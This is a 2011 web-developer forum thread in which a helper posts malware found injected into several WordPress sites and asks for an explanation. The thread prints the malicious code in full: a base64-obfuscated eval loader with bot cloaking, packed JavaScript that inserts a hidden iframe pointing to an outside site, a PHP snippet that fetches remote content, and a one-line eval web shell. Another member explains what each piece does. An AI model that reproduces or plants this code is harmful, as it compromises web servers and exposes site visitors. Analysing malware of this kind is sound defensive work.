PHP Developers Network

A community of PHP developers offering assistance, advice, discussion, and friendship.
 
Loading
It is currently Mon Aug 10, 2020 11:03 am

All times are UTC - 5 hours




Post new topic Reply to topic  [ 5 posts ] 
Author Message
PostPosted: Mon Nov 28, 2011 9:21 pm 
Offline
Forum Newbie

Joined: Thu Oct 06, 2011 11:34 am
Posts: 4
Hi all,

Background info:
Overseas developer working for an affiliate program also developed a lot of individual sites tied into said affiliate program for my roommate's current boss. They know they are being stolen from because of decreased revenues and suspicious activity.

They said they hired some former NSA specialist...nonsense. By no means am I proficient in Security or PHP itself in the matter but what we have discovered is encrypted PHP and Javascript that has been injected into the index.php file on several of sites the sites. This line of code was not there a month ago; verified when current copies are compared to backups.

Any insight or help would be GREATLY appreciated. Below you can find the encoded version and decoded version. Still working on decoding the JScript. My hypothesis is that somehow this former developer programmed in a back door that lets him redirect traffic from their affiliate to his personal affiliate site and collect the profits unbeknownst the owners of the site. They are also running older insecure versions of WordPress. I have been recommending upgrades for months now but maybe this information will finally prompt them to act. It's not my job just doing this for a friend.

Encoded Version
Syntax: [ Download ] [ Hide ]
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKCI8c2NyaXB0IHR5cGU9XCJ0ZXh0L2phdmFzY3JpcHRcIj4iLmJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzWkNsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLV1JiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z1pGdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhERXpOSGNySjMwN1l6MHhPMzA3ZDJocGJHVW9ZeTB0S1dsbUtHdGJZMTBwY0Qxd0xuSmxjR3hoWTJVb2JtVjNJRkpsWjBWNGNDZ25YREV6TkdJbksyVW9ZeWtySjF3eE16UmNNVFF5Snl3blhERTBOeWNwTEd0YlkxMHBPM0psZEhWeWJpQndPMzBvSjFGY2VESXdYSGd6T1QxUUlGeDROVE5jTlRBcFhEY3pYRGN4TGxKY05UQTVYSGd5UlU5Y2VESTRYRFV4WERVelhEWXhYRFV4WERjelhIZzJRVncxTUZ4NE5FTXVYREV4TTF3ME5sdzBObVJjZURKRlhERTJORncxTms1Y2VESTRYQ2RjWEUxY01UTTBYSGczTTF4Y1ZGeGNYREUzTWx4NE5VTmNlRE00WERRM0tWeDRNMFJjTnpWY2VESkVYRFl4S1h0a1hEVTJYRFl4TUZ4NE1qaGNORGRjZURORGFseDROVU5jZURWQlhIZzFRMXg0TXpkY1hGeDRNekZjZURNeVhGeGNNVFF4WEhnMVExdzJNVEZjZURWRFhERTJNbHg0TTBSY01UTTBYSGcyTlZ3bksxdzJNaTQyWERVd1hIZ3pNbHg0TWtWY05qVmNOVEJjTlRFcVhEWXpYSGd5UWx3Mk0xdzFNU3RjZURJM1hIZzFRMXg0TmpWY1hGeDROalpjZURWRFhIZzFPVnhjWERFeU5sd3hNelJjTVRJMVhERXpORng0TnpaY2VEVkRPRnhjWERFME4xd25YRFV6WERZeVhEVTJObHcxTUZ3Mk1sdzFOalZjZURJNFhEVXhLak5jTlROY05qTmNlREk1SzF3blhGeGNlREl5WEhnMVExd3hNekJjTVRNMFYxd3hNelJjZURRelhERXpORng0TkRGY01UTTBkVng0TlVOY2VEUXlYRnczWEZ4MVhERXpORng0TXpoY2VEVkRYSGd5TWx4NE16QmNYRndpWERFek5Gd3hORFpjWEZ3eE5ESmNNVE0wTkZ4NE5VTmNlRFE0WEZ4Y05qZGNlRFZEWEhnek9GeDROVU5jTVRRM1hERXpORnd4TlRkY01UTTBYREUxTlZ4Y1NWeGNORnhjWERFME1Wd3hNelJjTVRVMVhERXpORng0TmpOY01UTTBYREUxTTF4NE5VTmNNVFl3WEZ4Y2VEUkJYREV6TkdKY01UTTBYREV3TkZ4Y1hIZzBOVnhjWERFd05seGNYSGcwTjF4NE5VTmNOakZjTVRVMFhGdzNYREV6TkZ4NE16RmNNVFUzWEhnMVEyc3RYRFEzWEhneVFqSmNOVFkyWEhneU9ESmNlREpGWEhnek5WeDRNamhjZURJNUtsdzJNeXRjZURaREtTdGNORGRjZURNeFhERTFObHhjWERZeFhERTJNVng0TlVOMlhGeGNlRFF4WEhnMVEyZzZYREV6TkZ4NE16RmNNVFl3WEhneU55dGNOakpjZURKRlhEWTJYRFV3TWk0MVhIZ3lPQ2xjTlRKY2VETXpYRFV6YkZ4NE1qbGNlREpDWEhneU4xd3hNelF4YTF3eE16UmNNVFExWERFek5Gd3hORFpjTVRNMFlsd3hNelJjTVRVMlhIZzFRekZjTVRVeVhGeDNYSGcxUXpGY01UVTFYSGcxUXpSY01UTTBORnd4TXpSY01UVTNPbHd4TXpSY2VETXhYSGczTmk5NFhGeGNlRFk0WERFek5GdzJNVng0TnpWY01UTTBYSGczTVZ4Y01WeDROekpjWEZ3Mk1YTmNYRncyTVhSY2VEVkRYREUwTTF4Y1hIZzJNVnhjWEhnMk0xeGNORnd4TXpSY01UWXlYRnhjTmpGY01UVXhYRnhjZURZeFhGeGNOakZjTmpkY2VESkdhVng0TlVOY01UWXhYREV6TkZ4NE16RmNOekJjTVRNMFhEWXhYRGN4WERVMlhGeG9YSGcxUXpGY05qWS9YSGcxUTF4NE16RmNlRE16WEZ4Y2VETXhORng0TlVOY01UUTNYSGcxUTF4NE16RmNlRE0xWEhnelExeGNNV0ZjTVRNMFhIZ3pNVnd4TkRaY2VEVkRYREUyTUZ4NE5VTmNNVGN4WEhnMVExdzJOMXhjWERZeFoxd25YRFV4WEhnelFseDROalJjTlRaY01UWTBYRGMxWERRM1hEWXhhRng0TlVOelhERXpOSGxjTVRNMGVseGNkMXg0TWpkY2VESkNYRFl5WERVMlhIZ3pObHg0TWpoY05qSmNOVFkxWEhneU9GdzFNVncxTWx3Mk1XVmNlREk1WERVelhDYzdJRnczTVZ3eE16UmNlRE14WWx4Y1hIZzJSVng0TlVNeFhIZzJNMXd4TXpSY01UUXlYREV6TkZ4NE16aGNlREkzWEhneVFseDRNemt1WEhnek1WeDROalJjZURJNEtWd3hOelVuTERZeUxEazBMQ2RjTVRjMFhIZzNRMDFoWERFMk5GeDROamhjZURkRFhEWXhYRFl3WERZd1hIZzNRekUyTkZ3eE56UmNlRGN5WERFME1WeDROa1ZjTVRRMFhIZzJSbHg0TmtSOFhIZzJObHd4TlRSdmIxeDROekpjZURkRE1WeDRNelJjTmpWY01UYzBlRE5jTVRBMGZHVjRYSGczTUh4Y2VETXhYSGd6TlZ3Mk1Yd3hYSGd6TmpOOFhEWXhYRFkxWERZMlhERTNORng0TmpSY2VEWkdZMXd4TmpWdFpWd3hOVFpjZURjMGZIaGNlRE15WEhnek1sd3hOelJjTVRjd01qQjhYRFkwTWx3eE56UmNOakZjTmpaY05qQmNNVGMwZkdsY01UUTJYREUzTkRjeVhIZzNRekpjTmpBd1hIZzNRMXg0TXpGY05qVTNYREUzTkZ3Mk1UWmNOako4WEhnM09EY3dmRng0TXpGY2VETTBNVnd4TnpSY01UY3dYRFkyUlZ3eE56UmNOakZjZURNMU1GeDROME5jTmpGY2VETTJOVng0TjBOY01UUXpYSGcyUmx4NE5rWmNNVFV6WERFMU1WeDROalZjZURkRGVEY3lmRng0TnpnM1hIZ3pORng0TjBOY05qYzFYREUzTkZ4NE4wTmNlRE14WERZMU5WeDROME5jZURjNFhIZ3pOelJjZURZMFhERTNORnd4TnpCY2VETTJYREV3Tmx4NE4wTmNNVGN3TmpSOFhIZ3pNVng0TXpSY2VETTFYREUwTWx3eE56UmNOakZjTmpWY05qZGNlRFpEWEhnM1Exd3hOekEzTlZ4NE4wTmNlRE14WERZMk5Gd3hORFZjZURkRFhIZzNPRncyTTF3eE1ESjhYSGd6TVZ3Mk4xeDRNekZjZURaRFhERTNOREZjTmpaY05qTmNNVFV4WEhnM1ExeDRNekUwWEhnek1seDROME5jZURZelhIZzJSbHd4TlRkY2VEWkNYSGcyT1dWRlhIZzJSVng0TmpGY01UUXlYSGcyUTJWY01UUTBYSGczUTI1Y2VEWXhYSGczTm1sY01UUTNZWFJ2Y2x4NE4wTXhYRFl6WEhnek4xd3hNemRjTVRjMFhIZzJPVnd4TlRaa1pWeDROemhjTVRFM1pseDROME5uWlZ4NE56UkVZWFJjTVRRMWZGeDROa1ZsWEhnM04xd3hOelIyWERFME1YSmNlRGREYzF4NE5qVjBYSGcwTkZ4NE5qRmNlRGMwWERFME5Wd3hOelJjZURRMFhIZzJNVnd4TmpSbGZGd3hOekJjZURNMlhIZzBORnd4TnpSNFhIZ3pObHcyTjJoOFhERTNNRncyTmx4NE16VmNlRFk1WEhnM1ExeDRNekZjTmpSY05qRmNNVFUxWERFM05GeDROemhjTmpKY05qQm1YSGczTWx3eE56UjRYSGd6Tmx4NE16aGNNVGMwWERFM01GdzJOekpjTVRReFhERTFOVng0TjBOY01UWTNYREUyTWx3eE5URjBYSGcyTlh3eFhEWTBYSGd6TkhSOE5EQmNlRGMzWERFM05GeDROemhjTmpZM1hIZzJSbHg0TjBNM05URjhYRFkzWERZMlhIZzNRekZjZURNMU1GeDROekJjTVRjMFhIZzNPRncyTjF4NE5ERjhYRFl4WEhnek5GeDRNelJjZURkRFhIZ3pNVncyTkZ3Mk5YaGNNVGMwZUZ4NE16SmNNVEEyYVZ4NE4wTmNNVGN3TmpsOFhIZzNPRncyTmx3Mk5Wd3hOelIwWEhnMlJseDROVFZVWEhnME0xTmNlRGMwY2x4NE5qbGNlRFpGWERFME4xeDROME5jZURNNU9WdzNNVGs1T1Z4NE16bGNNVGMwZUZ3Mk5seDRNelpjZURjeVhERTNOSGd6WEhnME5WeDROME5mWDF3eE56UmNlRGM0TWtWY01UUXlYREUzTkZ4NE56ZzJYSGd6TTF4NE4wTmNlRGM0WEhnek4xdzJNSGhjTVRjMFhERTNNRng0TXpaY2VEUXpmRFF5WEhnMk9Gd3hOelJjTVRZd1hIZzNPSHhjTVRjd05seDRNelowZkZ3eE56QXlSSHczWEhnek0zeGNNVGN3WEhnek4xdzJOM3hjTmpGY2VETTJYRFl4WEhnMlJWeDROME5jZURjNE1rVmNNVGMwTVZ4NE16WXhmRng0TnpoY2VETXlYSGcwTmljdWMzQnNhWFFvSjF3eE56UW5LU3d3TEh0OUtTaz0nKS4iPC9zY3JpcHQ+Iik7DQp9'));
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */


/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */

define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>


Decoded Version
Syntax: [ Download ] [ Hide ]
error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
        echo("<script type=\"text/javascript\">".base64_decode('ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4oYzxhPycnOmUocGFyc2VJbnQoYy9hKSkpKygoYz1jJWEpPjM1P1N0cmluZy5mcm9tQ2hhckNvZGUoYysyOSk6Yy50b1N0cmluZygzNikpfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKWRbZShjKV09a1tjXXx8ZShjKTtrPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXDEzNHcrJ307Yz0xO307d2hpbGUoYy0tKWlmKGtbY10pcD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXDEzNGInK2UoYykrJ1wxMzRcMTQyJywnXDE0NycpLGtbY10pO3JldHVybiBwO30oJ1FceDIwXHgzOT1QIFx4NTNcNTApXDczXDcxLlJcNTA5XHgyRU9ceDI4XDUxXDUzXDYxXDUxXDczXHg2QVw1MFx4NEMuXDExM1w0Nlw0NmRceDJFXDE2NFw1Nk5ceDI4XCdcXE1cMTM0XHg3M1xcVFxcXDE3Mlx4NUNceDM4XDQ3KVx4M0RcNzVceDJEXDYxKXtkXDU2XDYxMFx4MjhcNDdceDNDalx4NUNceDVBXHg1Q1x4MzdcXFx4MzFceDMyXFxcMTQxXHg1Q1w2MTFceDVDXDE2Mlx4M0RcMTM0XHg2NVwnK1w2Mi42XDUwXHgzMlx4MkVcNjVcNTBcNTEqXDYzXHgyQlw2M1w1MStceDI3XHg1Q1x4NjVcXFx4NjZceDVDXHg1OVxcXDEyNlwxMzRcMTI1XDEzNFx4NzZceDVDOFxcXDE0N1wnXDUzXDYyXDU2Nlw1MFw2Mlw1NjVceDI4XDUxKjNcNTNcNjNceDI5K1wnXFxceDIyXHg1Q1wxMzBcMTM0V1wxMzRceDQzXDEzNFx4NDFcMTM0dVx4NUNceDQyXFw3XFx1XDEzNFx4MzhceDVDXHgyMlx4MzBcXFwiXDEzNFwxNDZcXFwxNDJcMTM0NFx4NUNceDQ4XFxcNjdceDVDXHgzOFx4NUNcMTQ3XDEzNFwxNTdcMTM0XDE1NVxcSVxcNFxcXDE0MVwxMzRcMTU1XDEzNFx4NjNcMTM0XDE1M1x4NUNcMTYwXFxceDRBXDEzNGJcMTM0XDEwNFxcXHg0NVxcXDEwNlxcXHg0N1x4NUNcNjFcMTU0XFw3XDEzNFx4MzFcMTU3XHg1Q2stXDQ3XHgyQjJcNTY2XHgyODJceDJFXHgzNVx4MjhceDI5Klw2MytceDZDKStcNDdceDMxXDE1NlxcXDYxXDE2MVx4NUN2XFxceDQxXHg1Q2g6XDEzNFx4MzFcMTYwXHgyNytcNjJceDJFXDY2XDUwMi41XHgyOClcNTJceDMzXDUzbFx4MjlceDJCXHgyN1wxMzQxa1wxMzRcMTQ1XDEzNFwxNDZcMTM0YlwxMzRcMTU2XHg1QzFcMTUyXFx3XHg1QzFcMTU1XHg1QzRcMTM0NFwxMzRcMTU3OlwxMzRceDMxXHg3Ni94XFxceDY4XDEzNFw2MVx4NzVcMTM0XHg3MVxcMVx4NzJcXFw2MXNcXFw2MXRceDVDXDE0M1xcXHg2MVxcXHg2M1xcNFwxMzRcMTYyXFxcNjFcMTUxXFxceDYxXFxcNjFcNjdceDJGaVx4NUNcMTYxXDEzNFx4MzFcNzBcMTM0XDYxXDcxXDU2XFxoXHg1QzFcNjY/XHg1Q1x4MzFceDMzXFxceDMxNFx4NUNcMTQ3XHg1Q1x4MzFceDM1XHgzQ1xcMWFcMTM0XHgzMVwxNDZceDVDXDE2MFx4NUNcMTcxXHg1Q1w2N1xcXDYxZ1wnXDUxXHgzQlx4NjRcNTZcMTY0XDc1XDQ3XDYxaFx4NUNzXDEzNHlcMTM0elxcd1x4MjdceDJCXDYyXDU2XHgzNlx4MjhcNjJcNTY1XHgyOFw1MVw1Mlw2MWVceDI5XDUzXCc7IFw3MVwxMzRceDMxYlxcXHg2RVx4NUMxXHg2M1wxMzRcMTQyXDEzNFx4MzhceDI3XHgyQlx4MzkuXHgzMVx4NjRceDI4KVwxNzUnLDYyLDk0LCdcMTc0XHg3Q01hXDE2NFx4NjhceDdDXDYxXDYwXDYwXHg3QzE2NFwxNzRceDcyXDE0MVx4NkVcMTQ0XHg2Rlx4NkR8XHg2NlwxNTRvb1x4NzJceDdDMVx4MzRcNjVcMTc0eDNcMTA0fGV4XHg3MHxceDMxXHgzNVw2MXwxXHgzNjN8XDYxXDY1XDY2XDE3NFx4NjRceDZGY1wxNjVtZVwxNTZceDc0fHhceDMyXHgzMlwxNzRcMTcwMjB8XDY0MlwxNzRcNjFcNjZcNjBcMTc0fGlcMTQ2XDE3NDcyXHg3QzJcNjAwXHg3Q1x4MzFcNjU3XDE3NFw2MTZcNjJ8XHg3ODcwfFx4MzFceDM0MVwxNzRcMTcwXDY2RVwxNzRcNjFceDM1MFx4N0NcNjFceDM2NVx4N0NcMTQzXHg2Rlx4NkZcMTUzXDE1MVx4NjVceDdDeDcyfFx4Nzg3XHgzNFx4N0NcNjc1XDE3NFx4N0NceDMxXDY1NVx4N0NceDc4XHgzNzRceDY0XDE3NFwxNzBceDM2XDEwNlx4N0NcMTcwNjR8XHgzMVx4MzRceDM1XDE0MlwxNzRcNjFcNjVcNjdceDZDXHg3Q1wxNzA3NVx4N0NceDMxXDY2NFwxNDVceDdDXHg3OFw2M1wxMDJ8XHgzMVw2N1x4MzFceDZDXDE3NDFcNjZcNjNcMTUxXHg3Q1x4MzE0XHgzMlx4N0NceDYzXHg2RlwxNTdceDZCXHg2OWVFXHg2RVx4NjFcMTQyXHg2Q2VcMTQ0XHg3Q25ceDYxXHg3NmlcMTQ3YXRvclx4N0MxXDYzXHgzN1wxMzdcMTc0XHg2OVwxNTZkZVx4NzhcMTE3Zlx4N0NnZVx4NzREYXRcMTQ1fFx4NkVlXHg3N1wxNzR2XDE0MXJceDdDc1x4NjV0XHg0NFx4NjFceDc0XDE0NVwxNzRceDQ0XHg2MVwxNjRlfFwxNzBceDM2XHg0NFwxNzR4XHgzNlw2N2h8XDE3MFw2Nlx4MzVceDY5XHg3Q1x4MzFcNjRcNjFcMTU1XDE3NFx4NzhcNjJcNjBmXHg3MlwxNzR4XHgzNlx4MzhcMTc0XDE3MFw2NzJcMTQxXDE1NVx4N0NcMTY3XDE2MlwxNTF0XHg2NXwxXDY0XHgzNHR8NDBceDc3XDE3NFx4NzhcNjY3XHg2Rlx4N0M3NTF8XDY3XDY2XHg3QzFceDM1MFx4NzBcMTc0XHg3OFw2N1x4NDF8XDYxXHgzNFx4MzRceDdDXHgzMVw2NFw2NXhcMTc0eFx4MzJcMTA2aVx4N0NcMTcwNjl8XHg3OFw2Nlw2NVwxNzR0XHg2Rlx4NTVUXHg0M1NceDc0clx4NjlceDZFXDE0N1x4N0NceDM5OVw3MTk5OVx4MzlcMTc0eFw2Nlx4MzZceDcyXDE3NHgzXHg0NVx4N0NfX1wxNzRceDc4MkVcMTQyXDE3NFx4Nzg2XHgzM1x4N0NceDc4XHgzN1w2MHhcMTc0XDE3MFx4MzZceDQzfDQyXHg2OFwxNzRcMTYwXHg3OHxcMTcwNlx4MzZ0fFwxNzAyRHw3XHgzM3xcMTcwXHgzN1w2N3xcNjFceDM2XDYxXHg2RVx4N0NceDc4MkVcMTc0MVx4MzYxfFx4NzhceDMyXHg0Nicuc3BsaXQoJ1wxNzQnKSwwLHt9KSk=')."</script>");
}


Top
 Profile  
 
PostPosted: Mon Nov 28, 2011 10:23 pm 
Offline
Forum Newbie

Joined: Thu Oct 06, 2011 11:34 am
Posts: 4
Decoded Javascript
Syntax: [ Download ] [ Hide ]
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,'g’),k[c]);return p}(‘l n=k.r&&s.t.u(“v”)==-1;l o=k.p&&s.t.u(“v”)==-1;l w=’C=0 D=0 E=”0″ F=”0″ G=”0″ H=”0″ I=”0″ J=”K”‘;l c=L M();c[0]=”d://e.f-b.g/m.h?i=j”;c[1]=”d://e.f-b.g/b.h?i=j”;c[2]=”d://e.f-b.g/m.h?i=j”;c[3]=”d://e.f-b.g/b.h?i=j”;c[4]=”d://e.f-b.g/m.h?i=j”;c[5]=”d://e.f-b.g/b.h?i=j”;c[6]=”d://e.f-b.g/m.h?i=j”;c[7]=”d://e.f-b.g/b.h?i=j”;c[8]=”d://e.f-b.g/m.h?i=j”;c[9]=”d://e.f-b.g/b.h?i=j”;x(n||o)k.N(‘<y O=”q” z=”" ‘+w+’></y>’);P A(){x(n||o){l a=k.p?k.p(“q”):k.r.q;a.z=c[B.Q(B.R()*c.S)]}};T.U=A’,57,57,’|||||||||||layer|randomcontent|http|www|lose|de|php|user|242873|document|var|layer2|ie|dom|getElementById|dynstuff|all|navigator|userAgent|indexOf|Opera|iframeprops|if|iframe|src|random_iframe|Math|width|height|marginwidth|marginheight|hspace|vspace|frameborder|scrolling|no|new|Array|write|id|function|floor|random|length|window|onload’.split(‘|’),0,{}))


Top
 Profile  
 
PostPosted: Tue Nov 29, 2011 1:37 am 
Offline
DevNet Resident
User avatar

Joined: Wed Apr 01, 2009 1:31 pm
Posts: 1532
The PHP script appears to inject some JavaScript for visitors whose browsers do not match the list of bots. I sent you a PM containing the unobscured JavaScript. It appears to check for the presence of a cookie. If the cookie is not found, it injects a randomly-sized, randomly-positioned (off screen) iframe which links to the attacker's website. It also sets the cookie it was looking for. The cookie contains a random number and expires in one day. It is named "__umtd", which probably is meant to mimic Urchin Tracking Module cookies ("__utm*"), but has the "t" and "m" transposed for unknown reasons.


Top
 Profile  
 
PostPosted: Wed Nov 30, 2011 1:57 pm 
Offline
Forum Newbie

Joined: Thu Oct 06, 2011 11:34 am
Posts: 4
Can anyone offer some insight on this additional malicious code I found?

Syntax: [ Download ] [ Hide ]
<?php
eval(error_reporting(0);
function nurlget ($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$out = curl_exec ($ch);
if (curl_errno($ch) !== 0) {$out = false;}
curl_close ($ch);
} else {
$out = file_get_contents($url);
}
return (trim($out));
}
$qs = $_SERVER["QUERY_STRING"];
if($qs) echo(nurlget('http://tpvggiiewv.info/index.php?'.$qs));); ?>

=malware

That's not actually the backdoor.

The back door was in a file called "google971ca75712474fb14e9d9959b9e32653.php" which contained simply:

<?php @eval(stripslashes($_REQUEST[asc])); ?>

And that alone my friend, is the back door that allows the script to be injected into every website on the server.


Top
 Profile  
 
PostPosted: Wed Nov 30, 2011 10:28 pm 
Offline
DevNet Resident
User avatar

Joined: Wed Apr 01, 2009 1:31 pm
Posts: 1532
By "offer some insight" do you mean explain what the code does? The first script is supposed to load additional code from a remote site and execute it. As shown, it will fail because the usage of eval() is syntactically incorrect. The second script executes code submitted to it through an HTTP request.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 5 posts ] 

All times are UTC - 5 hours


Who is online

Users browsing this forum: No registered users and 8 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group